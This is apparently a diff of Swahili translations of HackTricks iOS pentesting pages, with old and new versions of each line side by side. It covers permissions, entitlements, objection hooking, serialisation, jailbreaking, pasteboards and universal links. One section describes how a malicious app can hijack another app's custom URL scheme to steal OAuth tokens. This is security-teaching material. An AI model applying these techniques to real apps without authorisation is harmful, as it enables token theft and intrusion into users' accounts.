Wakuu wa programu wana uwezo wa kuunda **uwezo au ruhusa** fulani kwa programu zao, kama vile **Data Protection** au **Keychain Sharing**. Ruhusa hizi zinatumika mara moja baada ya programu kufungwa. Hata hivyo, ili kufikia rasilimali fulani zilizolindwa, programu inapaswa kupata idhini wazi kutoka kwa mtumiaji wakati wa jaribio la kwanza. Hii inafanywa kwa kutumia _purpose strings_ au _usage description strings_, ambazo zinawasilishwa kwa watumiaji katika arifa ya ombi la ruhusa.
Kwa wale wenye ufikiaji wa msimbo wa chanzo, uthibitishaji wa ruhusa zilizo katika faili ya `Info.plist` unaweza kufanywa kwa:
Kwa wale wenye ufikiaji wa msimbo wa chanzo, uthibitisho wa ruhusa zilizo katika faili ya `Info.plist` unaweza kufanywa kwa:
1. Kufungua mradi katika Xcode.
2. Kutafuta na kufungua faili ya `Info.plist`.
@ -107,18 +107,18 @@ Kwa mfano, purpose strings katika faili ya `Info.plist` zinaweza kuonekana kama
```
## Uwezo wa Kifaa
Faili ya `Info.plist` ya programu inaelezea **uwezo wa kifaa** ambao husaidia Duka la Programu kuchuja programu kwa ulinganifu wa kifaa. Hizi zimefafanuliwa chini ya ufunguo wa **`UIRequiredDeviceCapabilities`**. Kwa mfano:
Faili la `Info.plist` la programu linaelezea **uwezo wa kifaa** ambao husaidia Duka la Programu kuchuja programu kwa ajili ya ulinganifu wa kifaa. Haya yanafafanuliwa chini ya ufunguo wa **`UIRequiredDeviceCapabilities`**. Kwa mfano:
```xml
<key>UIRequiredDeviceCapabilities</key>
<array>
<string>armv7</string>
</array>
```
Hii mfano inaonyesha kwamba programu inafaa na seti ya maagizo ya armv7. Wataalamu wa programu wanaweza pia kubainisha uwezo kama nfc ili kuhakikisha programu yao inapatikana tu kwa vifaa vinavyounga mkono NFC.
Mfano huu unaonyesha kwamba programu inafaa na seti ya maagizo ya armv7. Wataalamu wa programu wanaweza pia kubainisha uwezo kama nfc ili kuhakikisha programu yao inapatikana tu kwa vifaa vinavyounga mkono NFC.
## Mamlaka
**Mamlaka** ni kipengele kingine muhimu katika maendeleo ya programu za iOS, kinachofanya kazi kama jozi za funguo-thamani zinazotoa ruhusa kwa programu kufanya operesheni fulani zaidi ya ukaguzi wa wakati wa utekelezaji. Kwa mfano, kuwezesha **Ulinzi wa Data** katika programu kunahusisha kuongeza mamlaka maalum katika mradi wa Xcode, ambayo kisha inaonyeshwa katika faili ya mamlaka ya programu au faili ya usambazaji wa simu iliyojumuishwa kwa IPAs.
**Mamlaka** ni kipengele kingine muhimu katika maendeleo ya programu za iOS, kinachofanya kazi kama jozi za funguo-thamani zinazotoa ruhusa kwa programu kufanya operesheni fulani zaidi ya ukaguzi wa wakati wa utekelezaji. Kwa mfano, kuwezesha **Ulinzi wa Data** katika programu inahusisha kuongeza mamlaka maalum katika mradi wa Xcode, ambayo kisha inaonyeshwa katika faili za mamlaka za programu au faili ya usambazaji wa simu iliyojumuishwa kwa IPAs.
# Marejeleo

8
src/mobile-pentesting/ios-pentesting/ios-custom-uri-handlers-deeplinks-custom-schemes.md
View File

@ -62,12 +62,12 @@ Watching for crashes from iGoat...
No logs were moved.
Opened URL: iGoat://?contactNumber=0&message=0
```
## Utekaji wa mpangilio wa URL wa kawaida
## Utekelezaji wa hijacking wa mpango wa URL wa kawaida
Kulingana na [**hiki chapisho**](https://evanconnelly.github.io/post/ios-oauth/), programu mbaya zinaweza **kujiandikisha mpangilio wa kawaida wa programu nyingine,** kisha programu mbaya inaweza kufungua kivinjari ambacho kina vidakuzi vyote vya Programu ya Safari na [ASWebAuthenticationSession](https://developer.apple.com/documentation/authenticationservices/aswebauthenticationsession/2990952-init#parameters).&#x20;
Kulingana na [**hiki kipande**](https://evanconnelly.github.io/post/ios-oauth/), programu mbaya zinaweza **kujiandikisha mipango ya kawaida ya programu nyingine,** kisha programu mbaya inaweza kufungua kivinjari ambacho kina vidakuzi vyote vya Programu ya Safari na [ASWebAuthenticationSession](https://developer.apple.com/documentation/authenticationservices/aswebauthenticationsession/2990952-init#parameters).&#x20;
Kwa kutumia kivinjari, programu mbaya inaweza kupakia ukurasa wa wavuti unaodhibitiwa na mshambuliaji na TCC itauliza mtumiaji wa simu ruhusa za kufungua programu hiyo. Kisha, ukurasa wa wavuti mbaya unaweza kuelekeza kwenye ukurasa wa mwathirika, kwa mfano mtiririko wa OAuth na parameter `prompt=none`. Ikiwa mtumiaji tayari alikuwa amejiandikisha katika mtiririko wa OAuth, mtiririko wa OAuth utatuma siri nyuma kwa programu ya mwathirika kwa kutumia mpangilio wa kawaida wa programu ya mwathirika.\
Hata hivyo, kwa sababu programu mbaya pia ilijiandikisha na kwa sababu kivinjari kinachotumika kiko ndani ya programu mbaya, mpangilio wa kawaida utashughulikiwa katika kesi hii na programu mbaya ambayo itakuwa na uwezo wa kuiba token ya OAuth.
Kwa kivinjari, programu mbaya inaweza kupakia ukurasa wa wavuti unaodhibitiwa na mshambuliaji na TCC itauliza mtumiaji wa simu ruhusa za kufungua programu hiyo. Kisha, ukurasa wa wavuti mbaya unaweza kuelekeza kwenye ukurasa wa mwathirika, kwa mfano mtiririko wa OAuth na parameter `prompt=none`. Ikiwa mtumiaji tayari alikuwa amejiandikisha katika mtiririko wa OAuth, mtiririko wa OAuth utatuma siri nyuma kwa programu ya mwathirika kwa kutumia mpango wa kawaida wa programu ya mwathirika.\
Hata hivyo, kwa sababu programu mbaya pia iliandikishwa na kwa sababu kivinjari kilichotumika kiko ndani ya programu mbaya, mpango wa kawaida utashughulikiwa katika kesi hii na programu mbaya ambayo itakuwa na uwezo wa kuiba token ya OAuth.
## Marejeo

6
src/mobile-pentesting/ios-pentesting/ios-hooking-with-objection.md
View File

@ -8,7 +8,7 @@ objection -d --gadget "OWASP.iGoat-Swift" explore
```
Unaweza pia kutekeleza `frida-ps -Uia` ili kuangalia michakato inayotembea ya simu.
# Orodha ya Msingi ya programu
# Uainishaji wa Msingi wa programu
## Njia za Programu za Mlokole
@ -181,7 +181,7 @@ ios hooking search methods cvv
# Hooking ya Msingi
Sasa kwamba umeshafanya **orodha ya madarasa na moduli** zinazotumiwa na programu unaweza kuwa umepata **majina ya darasa na mbinu za kuvutia**.
Sasa kwamba umeshafanya **uainishaji wa madarasa na moduli** zinazotumiwa na programu unaweza kuwa umepata **majina ya darasa na mbinu za kuvutia**.
## Hooking mbinu zote za darasa
@ -193,7 +193,7 @@ ios hooking watch class iGoat_Swift.PlistStorageExerciseViewController
## Hook mbinu moja
- `ios hooking watch method "-[<class_name> <method_name>]" --dump-args --dump-return --dump-backtrace`: Hook mbinu maalum ya darasa ikidondosha parameta, backtraces na marejeo ya mbinu kila wakati inapoitwa
- `ios hooking watch method "-[<class_name> <method_name>]" --dump-args --dump-return --dump-backtrace`: Hook mbinu maalum ya darasa ikidondosha parameta, marejeo na marejeo ya mbinu kila wakati inapoitwa
```bash
ios hooking watch method "-[iGoat_Swift.BinaryCookiesExerciseVC verifyItemPressed]" --dump-args --dump-backtrace --dump-return

10
src/mobile-pentesting/ios-pentesting/ios-serialisation-and-encoding.md
View File

@ -4,11 +4,11 @@ Code na maelezo zaidi katika [https://mas.owasp.org/MASTG/iOS/0x06h-Testing-Plat
## Uwekaji wa Vitu katika Maendeleo ya iOS
Katika iOS, **uwekaji wa vitu** unahusisha kubadilisha vitu kuwa katika muundo ambao unaweza kuhifadhiwa au kuhamasishwa kwa urahisi, na kisha kuyajenga tena kutoka katika muundo huu inapohitajika. Protokali mbili kuu, **`NSCoding`** na **`NSSecureCoding`**, zinawezesha mchakato huu kwa Objective-C au `NSObject` subclasses, zikiruhusu vitu kuwekewa katika **`NSData`**, muundo unaofunga buffer za byte.
Katika iOS, **uwekaji wa vitu** unahusisha kubadilisha vitu kuwa katika muundo ambao unaweza kuhifadhiwa au kuhamasishwa kwa urahisi, na kisha kuyajenga tena kutoka katika muundo huu inapohitajika. Protokali mbili kuu, **`NSCoding`** na **`NSSecureCoding`**, zinawezesha mchakato huu kwa Objective-C au `NSObject` subclasses, kuruhusu vitu kuwekewa katika **`NSData`**, muundo unaofunga buffer za byte.
### **`NSCoding`** Utekelezaji
Ili kutekeleza `NSCoding`, darasa lazima irithi kutoka `NSObject` au iwe imewekwa alama kama `@objc`. Protokali hii inahitaji utekelezaji wa mbinu mbili za kuandika na kusoma mabadiliko ya muktadha:
Ili kutekeleza `NSCoding`, darasa lazima irithi kutoka `NSObject` au iwe imewekwa alama kama `@objc`. Protokali hii inahitaji utekelezaji wa njia mbili za kuandika na kusoma mabadiliko ya mfano:
```swift
class CustomPoint: NSObject, NSCoding {
var x: Double = 0.0
@ -25,9 +25,9 @@ self.init(x: aDecoder.decodeDouble(forKey: "x"), name: name)
}
}
```
### **Kuimarisha Usalama na `NSSecureCoding`**
### **Kuimarisha Usalama kwa `NSSecureCoding`**
Ili kupunguza udhaifu ambapo washambuliaji wanaingiza data katika vitu vilivyoundwa tayari, **`NSSecureCoding`** inatoa itifaki iliyoimarishwa. Madarasa yanayokubaliana na `NSSecureCoding` yanapaswa kuthibitisha aina ya vitu wakati wa ufafanuzi, kuhakikisha kwamba ni aina za vitu zinazotarajiwa pekee ndizo zinazoanzishwa. Hata hivyo, ni muhimu kutambua kwamba ingawa `NSSecureCoding` inaongeza usalama wa aina, haifanyi usimbaji wa data au kuhakikisha uadilifu wake, hivyo inahitaji hatua za ziada za kulinda taarifa nyeti:
Ili kupunguza udhaifu ambapo washambuliaji wanaingiza data katika vitu vilivyoundwa tayari, **`NSSecureCoding`** inatoa itifaki iliyoimarishwa. Madarasa yanayokubaliana na `NSSecureCoding` yanapaswa kuthibitisha aina ya vitu wakati wa ufafanuzi, kuhakikisha kwamba ni aina za vitu zinazotarajiwa pekee ndizo zinazoanzishwa. Hata hivyo, ni muhimu kutambua kwamba ingawa `NSSecureCoding` inaimarisha usalama wa aina, haifanyi usimbaji wa data au kuhakikisha uadilifu wake, hivyo inahitaji hatua za ziada za kulinda taarifa nyeti:
```swift
static var supportsSecureCoding: Bool {
return true
@ -42,7 +42,7 @@ let obj = decoder.decodeObject(of: MyClass.self, forKey: "myKey")
NSKeyedArchiver.archiveRootObject(customPoint, toFile: "/path/to/archive")
let customPoint = NSKeyedUnarchiver.unarchiveObjectWithFile("/path/to/archive") as? CustomPoint
```
### Kutumia `Codable` kwa Urahisi wa Uandishi
### Kutumia `Codable` kwa Mchakato Rahisi wa Uandishi
Protokali ya `Codable` ya Swift inachanganya `Decodable` na `Encodable`, ikirahisisha uandishi na usomaji wa vitu kama `String`, `Int`, `Double`, nk, bila juhudi za ziada:
```swift

12
src/mobile-pentesting/ios-pentesting/ios-testing-environment.md
View File

@ -6,7 +6,7 @@
A **provisioning identity** ni mkusanyiko wa funguo za umma na za kibinafsi ambazo zinahusishwa na akaunti ya mdevelopa wa Apple. Ili **kusaini programu** unahitaji kulipa **99$/mwaka** ili kujiandikisha katika **Apple Developer Program** kupata kitambulisho chako cha usambazaji. Bila hii huwezi kuendesha programu kutoka kwa msimbo wa chanzo kwenye kifaa halisi. Chaguo lingine la kufanya hivi ni kutumia **kifaa kilichovunjwa**.
Kuanzia Xcode 7.2 Apple imeweka chaguo la kuunda **profaili ya usambazaji ya maendeleo ya iOS bure** inayokuruhusu kuandika na kujaribu programu yako kwenye iPhone halisi. Nenda kwenye _Xcode_ --> _Preferences_ --> _Accounts_ --> _+_ (Ongeza ID mpya ya Appli na akidi zako) --> _Bonyeza kwenye Apple ID iliyoundwa_ --> _Manage Certificates_ --> _+_ (Maendeleo ya Apple) --> _Done_\
Kuanzia Xcode 7.2 Apple imeweka chaguo la kuunda **profaili ya usambazaji ya maendeleo ya iOS bure** inayoruhusu kuandika na kujaribu programu yako kwenye iPhone halisi. Nenda kwenye _Xcode_ --> _Preferences_ --> _Accounts_ --> _+_ (Ongeza ID mpya ya Appli na akcredentials zako) --> _Bonyeza kwenye Apple ID iliyoundwa_ --> _Manage Certificates_ --> _+_ (Maendeleo ya Apple) --> _Done_\
\_\_Kisha, ili kuendesha programu yako kwenye iPhone yako unahitaji kwanza **kuonyesha iPhone kuamini kompyuta.** Kisha, unaweza kujaribu **kuendesha programu kwenye simu kutoka Xcode,** lakini hitilafu itaonekana. Hivyo nenda kwenye _Settings_ --> _General_ --> _Profiles and Device Management_ --> Chagua profaili isiyoaminika na bonyeza "**Amini**".
Kumbuka kwamba **programu zilizotiwa saini na cheti sawa za saini zinaweza kushiriki rasilimali kwa njia salama, kama vitu vya keychain**.
@ -20,7 +20,7 @@ Profaili za usambazaji zimehifadhiwa ndani ya simu katika **`/Library/MobileDevi
### **Simulator**
Jambo la kwanza unahitaji kujua ni kwamba **kufanya pentest ndani ya simulator kutakuwa na mipaka zaidi kuliko kufanya hivyo kwenye kifaa kilichovunjwa**.
Jambo la kwanza unahitaji kujua ni kwamba **kutekeleza pentest ndani ya simulator kutakuwa na mipaka zaidi kuliko kufanya hivyo kwenye kifaa kilichovunjwa**.
Zana zote zinazohitajika kujenga na kusaidia programu ya iOS zina **tu zinasupport rasmi kwenye Mac OS**.\
Zana ya de facto ya Apple kwa kuunda/kukarabati/kufanya kazi za iOS ni **Xcode**. Inaweza kutumika kupakua vipengele vingine kama **simulators** na **SDK** **toleo** tofauti zinazohitajika kujenga na **kujaribu** programu yako.\
@ -67,13 +67,13 @@ Apple inahitaji kwa nguvu kwamba msimbo unaotumika kwenye iPhone lazima uwe **um
Ingawa mara nyingi hufananishwa, **rooting** kwenye Android na **jailbreaking** kwenye iOS ni michakato tofauti kimsingi. Rooting vifaa vya Android inaweza kujumuisha **kufunga `su` binary** au **kurekebisha mfumo kwa ROM iliyoshikiliwa**, ambayo haihitaji lazima matumizi ya exploit ikiwa bootloader imefunguliwa. **Kuflash ROM za kawaida** kunabadilisha OS ya kifaa baada ya kufungua bootloader, wakati mwingine kunahitaji exploit.
Kwa upande mwingine, vifaa vya iOS haviwezi kuflash ROM za kawaida kutokana na vizuizi vya bootloader vya kuanzisha picha tu zilizotiwa saini na Apple. **Jailbreaking iOS** inalenga kukwepa ulinzi wa saini wa msimbo wa Apple ili kuendesha msimbo usio na saini, mchakato ambao unachanganya na maboresho ya usalama ya Apple yanayoendelea.
Kwa upande mwingine, vifaa vya iOS haviwezi kuflash ROM za kawaida kutokana na vizuizi vya bootloader vya kuanzisha picha zilizotiwa saini na Apple pekee. **Jailbreaking iOS** inalenga kukwepa ulinzi wa saini wa msimbo wa Apple ili kuendesha msimbo usio na saini, mchakato ambao unachanganya na maboresho ya usalama ya Apple yanayoendelea.
### Changamoto za Jailbreaking
Jailbreaking iOS inakuwa ngumu zaidi kadri Apple inavyorekebisha udhaifu haraka. **Kudondosha iOS** kunawezekana tu kwa muda mfupi baada ya kutolewa, na kufanya jailbreaking kuwa suala la muda. Vifaa vinavyotumika kwa majaribio ya usalama havipaswi kusasishwa isipokuwa re-jailbreaking inahakikishwa.
Sasisho za iOS zinadhibitiwa na **mekanismu ya changamoto-jibu** (SHSH blobs), ikiruhusu usakinishaji tu kwa majibu yaliyotiwa saini na Apple. Mekanismu hii, inayojulikana kama "dirisha la saini", inakabili uwezo wa kuhifadhi na kutumia baadaye vifurushi vya firmware vya OTA. Tovuti ya [IPSW Downloads](https://ipsw.me) ni rasilimali ya kuangalia dirisha za sasa za saini.
Sasisho za iOS zinadhibitiwa na **mekanismu ya changamoto-jibu** (SHSH blobs), ikiruhusu usakinishaji tu kwa majibu yaliyotiwa saini na Apple. Mekanismu hii, inayojulikana kama "dirisha la saini", inapunguza uwezo wa kuhifadhi na kutumia baadaye vifurushi vya firmware vya OTA. Tovuti ya [IPSW Downloads](https://ipsw.me) ni rasilimali ya kuangalia dirisha za sasa za saini.
### Aina za Jailbreak
@ -94,7 +94,7 @@ Kurekebisha kifaa chako kuna hatari, na jailbreaking inapaswa kuchukuliwa kwa ta
### Manufaa na Hatari za Jailbreaking
Jailbreaking **inatoa sandboxing iliyowekwa na OS**, ikiruhusu programu kufikia mfumo mzima wa faili. Uhuru huu unaruhusu usakinishaji wa programu zisizothibitishwa na ufikiaji wa APIs zaidi. Hata hivyo, kwa watumiaji wa kawaida, jailbreaking **haitashauriwa** kutokana na hatari za usalama na kutokuwa thabiti kwa kifaa.
Jailbreaking **inondoa sandboxing iliyowekwa na OS**, ikiruhusu programu kufikia mfumo mzima wa faili. Uhuru huu unaruhusu usakinishaji wa programu zisizothibitishwa na ufikiaji wa APIs zaidi. Hata hivyo, kwa watumiaji wa kawaida, jailbreaking **haitashauriwa** kutokana na hatari za usalama na kutokuwa thabiti kwa kifaa.
### **Baada ya Jailbreaking**
@ -110,7 +110,7 @@ basic-ios-testing-operations.md
- Katika kifaa kilichojailbreak programu zinapata **ufikiaji wa kusoma/kandika kwa faili mpya** nje ya sandbox
- Baadhi ya **API** **itoaji** zitakuwa **na tabia tofauti**
- Uwepo wa huduma ya **OpenSSH**
- Kuita `/bin/sh` kutarudi **1** badala ya 0
- Kuita `/bin/sh` itarudisha **1** badala ya 0
**Taarifa zaidi kuhusu jinsi ya kugundua jailbreaking** [**hapa**](https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/jailbreak-detection-methods/)**.**

10
src/mobile-pentesting/ios-pentesting/ios-uiactivity-sharing.md
View File

@ -4,9 +4,9 @@
# UIActivity Sharing Simplified
Kuanzia iOS 6 na kuendelea, programu za wahusika wengine zimewezeshwa **kushiriki data** kama vile maandiko, URLs, au picha kwa kutumia mitambo kama AirDrop, kama ilivyoelezwa katika [mwongozo wa Mawasiliano Kati ya Programu za Apple](https://developer.apple.com/library/archive/documentation/iPhone/Conceptual/iPhoneOSProgrammingGuide/Inter-AppCommunication/Inter-AppCommunication.html#//apple_ref/doc/uid/TP40007072-CH6-SW3). Kipengele hiki kinaonekana kupitia _karatasi ya shughuli za kushiriki_ inayojitokeza unapofanya kazi na kitufe cha "Share".
Kuanzia iOS 6, programu za upande wa tatu zimewezeshwa **kushiriki data** kama maandiko, URLs, au picha kwa kutumia mitambo kama AirDrop, kama ilivyoelezwa katika [mwongozo wa Mawasiliano Kati ya Programu za Apple](https://developer.apple.com/library/archive/documentation/iPhone/Conceptual/iPhoneOSProgrammingGuide/Inter-AppCommunication/Inter-AppCommunication.html#//apple_ref/doc/uid/TP40007072-CH6-SW3). Kipengele hiki kinaonekana kupitia _karatasi ya shughuli ya kushiriki_ inayojitokeza unaposhughulika na kitufe cha "Share".
Orodha kamili ya chaguo zote za kushiriki zilizojengwa ndani inapatikana katika [UIActivity.ActivityType](https://developer.apple.com/documentation/uikit/uiactivity/activitytype). Wataalamu wa programu wanaweza kuchagua kutengwa kwa chaguzi maalum za kushiriki ikiwa wanaona hazifai kwa programu yao.
Orodha kamili ya chaguzi zote za kushiriki zilizojengwa ndani inapatikana katika [UIActivity.ActivityType](https://developer.apple.com/documentation/uikit/uiactivity/activitytype). Wataalamu wa maendeleo wanaweza kuchagua kutengwa kwa chaguzi maalum za kushiriki ikiwa wanaona hazifai kwa programu yao.
## **Jinsi ya Kushiriki Data**
@ -21,7 +21,7 @@ Kushiriki kunarahisishwa kupitia uundaji wa `UIActivityViewController`, ambapo v
$ rabin2 -zq Telegram\ X.app/Telegram\ X | grep -i activityItems
0x1000df034 45 44 initWithActivityItems:applicationActivities:
```
Wakandarasi wanapaswa kuangalia kwa makini `UIActivityViewController` kwa shughuli na shughuli za kawaida ambazo imeanzishwa nazo, pamoja na aina zozote za `excludedActivityTypes` zilizotajwa.
Wak developers wanapaswa kuchunguza `UIActivityViewController` kwa shughuli na shughuli za kawaida ambazo imeanzishwa nazo, pamoja na aina zozote za `excludedActivityTypes` zilizotajwa.
## **Jinsi ya Kupokea Data**
@ -31,9 +31,9 @@ Vipengele vifuatavyo ni muhimu unapopokea data:
- Mwelekeo wa **aina za hati ambazo programu inaweza kufungua**.
- Uthibitishaji wa **uaminifu wa data iliyopokelewa**.
Bila ufikiaji wa msimbo wa chanzo, mtu bado anaweza kuchunguza `Info.plist` kwa funguo kama `UTExportedTypeDeclarations`, `UTImportedTypeDeclarations`, na `CFBundleDocumentTypes` ili kuelewa aina za hati ambazo programu inaweza kushughulikia na kutangaza.
Bila ufikiaji wa msimbo wa chanzo, mtu anaweza bado kuchunguza `Info.plist` kwa funguo kama `UTExportedTypeDeclarations`, `UTImportedTypeDeclarations`, na `CFBundleDocumentTypes` ili kuelewa aina za hati ambazo programu inaweza kushughulikia na kutangaza.
Mwongozo mfupi juu ya funguo hizi upatikana kwenye [Stackoverflow](https://stackoverflow.com/questions/21937978/what-are-utimportedtypedeclarations-and-utexportedtypedeclarations-used-for-on-i), ikisisitiza umuhimu wa kufafanua na kuingiza UTIs kwa kutambuliwa kwa mfumo mzima na kuunganisha aina za hati na programu yako kwa ushirikiano katika mazungumzo ya "Fungua na".
Mwongozo mfupi juu ya funguo hizi upatikana kwenye [Stackoverflow](https://stackoverflow.com/questions/21937978/what-are-utimportedtypedeclarations-and-utexportedtypedeclarations-used-for-on-i), ukisisitiza umuhimu wa kufafanua na kuingiza UTIs kwa kutambuliwa kwa mfumo mzima na kuunganisha aina za hati na programu yako kwa ushirikiano katika mazungumzo ya "Fungua na".
## Mbinu ya Kujaribu ya Kijadi

14
src/mobile-pentesting/ios-pentesting/ios-uipasteboard.md
View File

@ -2,24 +2,24 @@
Kushiriki data ndani na kati ya programu kwenye vifaa vya iOS kunarahisishwa na mekanizma ya [`UIPasteboard`](https://developer.apple.com/documentation/uikit/uipasteboard), ambayo imegawanywa katika makundi mawili makuu:
- **Systemwide general pasteboard**: Hii inatumika kwa kushiriki data na **programu yoyote** na imeundwa kudumisha data wakati wa upya wa kifaa na kufuta programu, kipengele ambacho kimekuwa kinapatikana tangu iOS 10.
- **Custom / Named pasteboards**: Hizi ni maalum kwa kushiriki data **ndani ya programu au na programu nyingine** inayoshiriki kitambulisho sawa cha timu, na hazijaundwa kudumu zaidi ya maisha ya mchakato wa programu unaoziunda, kufuatia mabadiliko yaliyoanzishwa katika iOS 10.
- **Systemwide general pasteboard**: Hii inatumika kwa kushiriki data na **programu yoyote** na imeundwa kudumisha data wakati wa upya wa kifaa na kufutwa kwa programu, kipengele ambacho kimekuwa kinapatikana tangu iOS 10.
- **Custom / Named pasteboards**: Hizi ni maalum kwa kushiriki data **ndani ya programu au na programu nyingine** inayoshiriki kitambulisho sawa cha timu, na hazijaundwa kudumu zaidi ya maisha ya mchakato wa programu unaoziumba, kufuatia mabadiliko yaliyoanzishwa katika iOS 10.
**Mambo ya usalama** yana jukumu muhimu wakati wa kutumia pasteboards. Kwa mfano:
- Hakuna mekanizma kwa watumiaji kusimamia ruhusa za programu kufikia **pasteboard**.
- Ili kupunguza hatari ya ufuatiliaji usioidhinishwa wa nyuma wa pasteboard, ufikiaji unazuiliwa wakati programu iko mbele (tangu iOS 9).
- Ili kupunguza hatari ya ufuatiliaji wa nyuma usioidhinishwa wa pasteboard, ufikiaji unazuiliwa wakati programu iko mbele (tangu iOS 9).
- Matumizi ya pasteboards zenye majina yanayodumu yanakemewa kwa ajili ya vyombo vya kushiriki kutokana na wasiwasi wa faragha.
- Kipengele cha **Universal Clipboard** kilichozinduliwa na iOS 10, kinachoruhusu maudhui kushirikiwa kati ya vifaa kupitia pasteboard ya jumla, kinaweza kusimamiwa na wabunifu kuweka muda wa kuisha wa data na kuzima uhamishaji wa maudhui kiotomatiki.
- Kipengele cha **Universal Clipboard** kilichoanzishwa na iOS 10, kinachoruhusu maudhui kushirikiwa kati ya vifaa kupitia pasteboard ya jumla, kinaweza kusimamiwa na waendelezaji kuweka muda wa kuisha kwa data na kuzima uhamishaji wa maudhui kiotomatiki.
Kuhakikisha kwamba **taarifa nyeti hazihifadhiwi bila kukusudia** kwenye pasteboard ya ulimwengu ni muhimu. Zaidi ya hayo, programu zinapaswa kubuniwa kuzuia matumizi mabaya ya data ya pasteboard ya ulimwengu kwa vitendo visivyokusudiwa, na wabunifu wanahimizwa kutekeleza hatua za kuzuia kunakiliwa kwa taarifa nyeti kwenye clipboard.
Kuhakikisha kwamba **taarifa nyeti hazihifadhiwi bila kukusudia** kwenye pasteboard ya ulimwengu ni muhimu. Zaidi ya hayo, programu zinapaswa kubuniwa kuzuia matumizi mabaya ya data ya pasteboard ya ulimwengu kwa vitendo visivyokusudiwa, na waendelezaji wanahimizwa kutekeleza hatua za kuzuia nakala ya taarifa nyeti kwenye clipboard.
### Uchambuzi wa Kijamii
Kwa uchambuzi wa kijamii, tafuta msimbo wa chanzo au binary kwa:
Kwa uchambuzi wa kijamii, tafuta katika msimbo wa chanzo au binary kwa:
- `generalPasteboard` ili kubaini matumizi ya **systemwide general pasteboard**.
- `pasteboardWithName:create:` na `pasteboardWithUniqueName` kwa kuunda **custom pasteboards**. Thibitisha ikiwa kudumu kumearifiwa, ingawa hii imeondolewa.
- `pasteboardWithName:create:` na `pasteboardWithUniqueName` kwa kuunda **custom pasteboards**. Thibitisha ikiwa kudumu kumewashwa, ingawa hii imeondolewa.
### Uchambuzi wa Kijamii

14
src/mobile-pentesting/ios-pentesting/ios-universal-links.md
View File

@ -6,11 +6,11 @@
Universal links hutoa **uzoefu wa uelekezaji usio na mshono** kwa watumiaji kwa kufungua moja kwa moja maudhui katika programu, bila ya kuhitaji uelekezaji wa Safari. Viungo hivi ni **vya kipekee** na salama, kwani haviwezi kudaiwa na programu nyingine. Hii inahakikishwa kwa kuhifadhi faili ya `apple-app-site-association` ya JSON katika saraka ya mizizi ya tovuti, ikianzisha kiungo kinachoweza kuthibitishwa kati ya tovuti na programu. Katika hali ambapo programu haijasanidiwa, Safari itachukua jukumu na kumwelekeza mtumiaji kwenye ukurasa wa wavuti, ikihifadhi uwepo wa programu.
Kwa wapimaji wa penetration, faili ya `apple-app-site-association` ni ya umuhimu maalum kwani inaweza kufichua **njia nyeti**, huenda ikijumuisha zile zinazohusiana na vipengele ambavyo havijachapishwa.
Kwa wapimaji wa udukuzi, faili ya `apple-app-site-association` ni ya umuhimu maalum kwani inaweza kufichua **njia nyeti**, huenda ikijumuisha zile zinazohusiana na vipengele ambavyo havijachapishwa.
### **Kuchambua Haki za Domains Zinazohusishwa**
Wakuu wa programu wanawezesha Universal Links kwa kusanidi **Domains Zinazohusishwa** katika tab ya Capabilities ya Xcode au kwa kukagua faili ya `.entitlements`. Kila domain inaanzishwa na `applinks:`. Kwa mfano, usanidi wa Telegram unaweza kuonekana kama ifuatavyo:
Wakuu wa programu wanawezesha Universal Links kwa kuunda **Domains Zinazohusishwa** katika tab ya Uwezo ya Xcode au kwa kukagua faili ya `.entitlements`. Kila domain inaanzishwa na `applinks:`. Kwa mfano, usanidi wa Telegram unaweza kuonekana kama ifuatavyo:
```xml
<key>com.apple.developer.associated-domains</key>
<array>
@ -22,17 +22,17 @@ Kwa maelezo zaidi ya kina, rejelea [archived Apple Developer Documentation](http
Ikiwa unafanya kazi na programu iliyokusanywa, ruhusa zinaweza kutolewa kama ilivyoelezwa katika [hiki kiongozi](extracting-entitlements-from-compiled-application.md).
### **Kurejesha Faili ya Muungano wa Tovuti ya Apple App**
### **Kurejesha Faili la Apple App Site Association**
Faili ya `apple-app-site-association` inapaswa kurejeshwa kutoka kwa seva kwa kutumia maeneo yaliyoainishwa katika ruhusa. Hakikisha faili inapatikana kupitia HTTPS moja kwa moja kwenye `https://<domain>/apple-app-site-association`. Zana kama [Apple App Site Association (AASA) Validator](https://branch.io/resources/aasa-validator/) zinaweza kusaidia katika mchakato huu.
Faili la `apple-app-site-association` linapaswa kurejeshwa kutoka kwa seva kwa kutumia maeneo yaliyoainishwa katika ruhusa. Hakikisha faili inapatikana kupitia HTTPS moja kwa moja kwenye `https://<domain>/apple-app-site-association`. Zana kama [Apple App Site Association (AASA) Validator](https://branch.io/resources/aasa-validator/) zinaweza kusaidia katika mchakato huu.
### **Kushughulikia Viungo vya Ulimwengu katika Programu**
### **Kushughulikia Universal Links katika Programu**
Programu lazima itekeleze mbinu maalum ili kushughulikia viungo vya ulimwengu kwa usahihi. Mbinu kuu ya kutafuta ni [`application:continueUserActivity:restorationHandler:`](https://developer.apple.com/documentation/uikit/uiapplicationdelegate/1623072-application). Ni muhimu kwamba mpango wa URL zinazoshughulikiwa ni HTTP au HTTPS, kwani zingine hazitasaidiwa.
Programu lazima itekeleze mbinu maalum ili kushughulikia universal links kwa usahihi. Mbinu kuu ya kutafuta ni [`application:continueUserActivity:restorationHandler:`](https://developer.apple.com/documentation/uikit/uiapplicationdelegate/1623072-application). Ni muhimu kwamba mpango wa URLs zinazoshughulikiwa ni HTTP au HTTPS, kwani zingine hazitasaidiwa.
#### **Kuthibitisha Mbinu ya Kushughulikia Data**
Wakati kiungo cha ulimwengu kinapofungua programu, kitu cha `NSUserActivity` kinapitishwa kwa programu na URL. Kabla ya kushughulikia URL hii, ni muhimu kuthibitisha na kusafisha ili kuzuia hatari za usalama. Hapa kuna mfano katika Swift unaoonyesha mchakato:
Wakati link ya universal inafungua programu, kitu cha `NSUserActivity` kinapitishwa kwa programu na URL. Kabla ya kushughulikia URL hii, ni muhimu kuthibitisha na kusafisha ili kuzuia hatari za usalama. Hapa kuna mfano katika Swift unaoonyesha mchakato:
```swift
func application(_ application: UIApplication, continue userActivity: NSUserActivity,
restorationHandler: @escaping ([UIUserActivityRestoring]?) -> Void) -> Bool {

28
src/mobile-pentesting/ios-pentesting/ios-webviews.md
View File

@ -2,7 +2,7 @@
{{#include ../../banners/hacktricks-training.md}}
Msimbo wa ukurasa huu umetolewa kutoka [here](https://github.com/chame1eon/owasp-mstg/blob/master/Document/0x06h-Testing-Platform-Interaction.md). Angalia ukurasa kwa maelezo zaidi.
